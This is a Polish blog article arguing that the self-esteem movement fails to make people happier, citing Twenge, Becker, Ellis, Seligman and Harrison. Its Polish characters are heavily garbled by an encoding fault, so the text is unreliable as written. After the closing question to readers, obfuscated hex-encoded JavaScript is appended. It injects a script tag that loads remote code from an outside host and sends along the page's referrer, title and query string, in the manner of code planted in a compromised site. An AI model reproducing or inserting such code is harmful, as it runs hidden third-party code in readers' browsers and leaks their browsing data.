łazUwierz w siebiełó
łazPokochaj siebiełó
łazJesteła wyjłatkowyłó
łazLiczy siła tylko to co sam o sobie myłaliszłó
łazKochaj siebie na pierwszym miejscułó
łazWarto czasem była samolubnymłó
Współaczesny ławiat bombarduje nas tymi i podobnymi hasłami. Mamy była dla siebie najwaóniejsi, asertywni, zawsze myłaleła o sobie dobrze, a nawetła�była egoistyczni. Powstałay termin pozytywny egoizmłamówi o utrzymywaniu koncentracji na sobie, dbaniu o siebie i łamiałaym zajmowaniu centralnej pozycji w swoim własnym ławiecie. Choła ławiat uczy, by ego stawiała na piedestale,ła człasto wcale nie jest nam ze sobła dobrze, szukamy akceptacji innych, jestełamy niewolnikami ich pochwała. Słayszymy, óe dzieje siła tak, bo za małao kochamy siebie i mamy niskie poczucie własnej wartołaci. Czy jednak zbudowanie wysokiego poczucia własnej wartołaci i uwierzenie w siebie sprawiajła, óe jestełamy szczłałaliwsi? Okazuje siła, óe nie.
Skład ta obsesjó
Idea rozwijania poczucia własnej wartołaci obiecuje nam wiele: ma odpowiedzieła na pytanie ile jestełamy warci, nadała sens naszemu óyciu. Zbudowanie wysokiej samooceny ma prowadziła nas do sukcesu, zapewniła udane relacje z innymi, sprawiła, óe dobrze bładziemy czuła siła ze sobła,jednym słaowem-ma dała nam szczłałaliwe óycie. Na całaym ławiecie powstajła ruchy, kursy, szkolenia iłaksiłaóki o tym, jak zwiłakszyła poczucie własnej wartołaci czy podniełała samoocenła. Ksiłaóki motywacyjne przekonujła nas, óe jestełamy wyjłatkowi i moóemy wszystko, wystarczy uwierzyła w siebie. Warto jednak zapytała, czy to siła sprawdziłao? Czy obietnice zostałay spełanione? Czy zachłacajłac ludzi, by cenili i kochali siebie, uzyskuje siła oczekiwany efekt?
Za sprawła edukacji terapeutycznej i wprowadzenia koncepcji poczucia własnej wartołaci do programów nauczania w USA, odnotowano znaczny wzrost poczucia własnej wartołaci u dzieci i nastolatków. Badania (dr Jean M. Twenge, 2006) pokazujła, óe nastolatkowie, którzy zostali poddani testom, uznajła siła za atrakcyjnych fizycznie, bardzo inteligentnych, odpowiedzialnych. Chłatnie zgadzajła siła z takimi stwierdzeniami jak:łajestem waónła osobła, z łatwołaciła przychodzi mi manipulacja innymi, domagam siła naleónego mi szacunku, zawsze postłapujła włałaciwie. Twenge zbadała, óe budowanie wysokiej samooceny wiłaóe siła z wiłakszła pewnołaciła siebie, asertywnołaciła, rozczeniowołaciła oraz brakiem empatii.ła Twierdzi ona takóe, óe dzisiejsi młaodzi Amerykanie sła bardziej nieszczłałaliwi nió kiedykolwiek wczełaniej.
Badania pokazujła, óe zwiłakszanie poczucia własnej wartołaci nie ma pozytywnych efektów w dziedzinie edukacji, za to otrzymano negatywne wyniki w sferze zdrowia psychicznego. Brak teó pozytywnego wpłaywu na przystosowanie społaeczne czy tworzenie zdrowych zwiłazków miładzyludzkich. Co wiłacej, wielu psychologów obwinia ruch poczucia własnej wartołaci o tworzenie negatywnych tendencji społaecznych takich jak: rozwój kultury celebrytów, roszczeniowołała, egoizm i narcyzm. Próby poczucia siła dobrze we własnej skórze z regułay wzmagajła niepokój, zamiast go leczyła. Dzieje siła tak dlatego, óe wysiłaek wkładany w starania o uniezaleónienie siła od opinii innych prowadzi do powtarzania starych nawyków, do których naleóy porównywanie siła oraz chłała zdobycia akceptacji.
Po co nam wysoka samoocenó
Psychologiczna szkoła upowszechniajłaca teoriła opanowywania trwogi zainspirowana badaniami Ernsta Beckera, uczy, óe poczucie własnej wartołaci jest psychologicznła obronła przed niepokojem egzystencjonalnym. óudzimy siła iluzjła wysokiej wartołaci po to, by odsunłała od siebie myłal o tym, óe jestełamy nieistotni i w kołacu przeminiemy. Jednak, jak twierdzi Becker, budowanie wysokiej samooceny nie pomaga w pozbyciu siła tej metafizycznej niepewnołaci.
Psycholog Albert Ellis potłapia ideologiła poczucia własnej wartołaci, twierdzłac, óe jest ona bezmyłalna i absurdalna. Uwaóa on, óe powinniłamy oceniała nasze cechy i zachowania, nie zała siebie w pojłaciu ogólnym. Naleóy wiłac rozwijała pewnołała swoich umiejłatnołaci, a nie pewnołała siebie. Ellis proponuje rozwiłazanie, by przestała uóalała siła nad sobła, wydajłac ogólne słady o sobie, a skupiła siła na rozwijaniu swoich mocnych stron w poszczególnych dziedzinach. Uwaóa on, óe ideologia poczucia własnej wartołaci oferuje nam filozoficznła pustkła. Człaowiek składa siła z setek indywidualnych cech, które prowadzła do róónorodnych – dobrych lub złaych – działała. Próba szufladkowania siebie ze wzglładu na ogólnła ocenła naszej osoby jest wg niego nielogiczna. Zamiast dłaóyła do całaołaciowej oceny pt.łajestem super, czy jestem nic niewart, postarajmy siła oceniała tylko swoje poszczególne zachowania.
Martin Seligman – twórca psychologii pozytywnej twierdzi, óe samochwalenie siła jest bezcelowe i niemalóe nieuczciwe. Odrzuca on łalepy optymizm i utarte przekonania typu: jestem wyjłatkowy, kaódego dnia stajła siła lepszy, twierdzłac óe człaowiek powinien uczyła siła myłaleła realistycznie o óyciowych przeciwnołaciach, a nie poddawała siła ulotnemu optymizmowi autoreklamy.łaPsychologowie przeciwni skupianiu siła na budowaniu poczucia własnej wartołaci uwaóajła, óe realistyczne spojrzenie na własnła osobła jest niezbładnła człałaciła prawidłaowego rozwoju zdrowia psychicznego. Nie odrzucajła oni potrzeby budowania włałaciwego obrazu siebie.
Wiele czasu spładzamy na analizowaniu swoich odczuła, ocenianie tego, jak jestełamy postrzegani i porównywaniu siła z innymi. łaycie staje siła wówczas sinusoidła niespokojnego egocentryzmu – po chwili dumy i zadowolenia, kiedy udaje nam siła sprostała oczekiwaniom, nastłapujła chwile załamania i wstydu, kiedy napotykamy niepowodzenia. Co wtedy, gdy obiektywna ocena naszego zachowania nie pozwala nam myłaleła o sobie dobrze? Wedłaug Glynna Harrisona, profesora psychiatrii, mamy zaprzestałała osładzania całaej swojej osoby, nie oceniała siebie w kategoriach dobry, złay, wartołaciowy, niewartołaciowy. Powinniłamy umieła odniełała siła do swoich konkretnych zachowała, słabołaci, wad i uławiadomiła sobie ich przyczyny. Zamiast karała siła w obliczu poraóki, uóalała nad sobła i próbowała chroniła swoje ego, myłalłac o sobie, óe i tak jestełamy super i udowadniała,ła óe jestełamy lepsi od innych, powinniłamy okazała sobie współaczucie, cierpliwołaci i wyrozumiałaołała. W towarzystwie tych emocji i akceptacji tego, óe nie jestełamy idealni, mamy podjłała władrówkła samodoskonalenia siła, wykraczajłacła ponad nasze ego. Warto bowiem czasem przestała koncentrowała siła wyłałacznie na swoim Jałai spojrzeła na rzeczywistołała szczerzej – poza nas samych.
A co Wy o tym sładzicie? Czy uwaóacie, óe wysokie poczucie własnej wartołaci i wysoka samoocena sła nam potrzebne do bycia szczłałaliwym? Czy moóna odniełała sukces, mieła udane relacje z innymi i czuła siła ze sobła dobrze, nie bładłac pewnym siebie i nie koncentrujłac siła na sobie w pierwszej kolejnołaci?var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}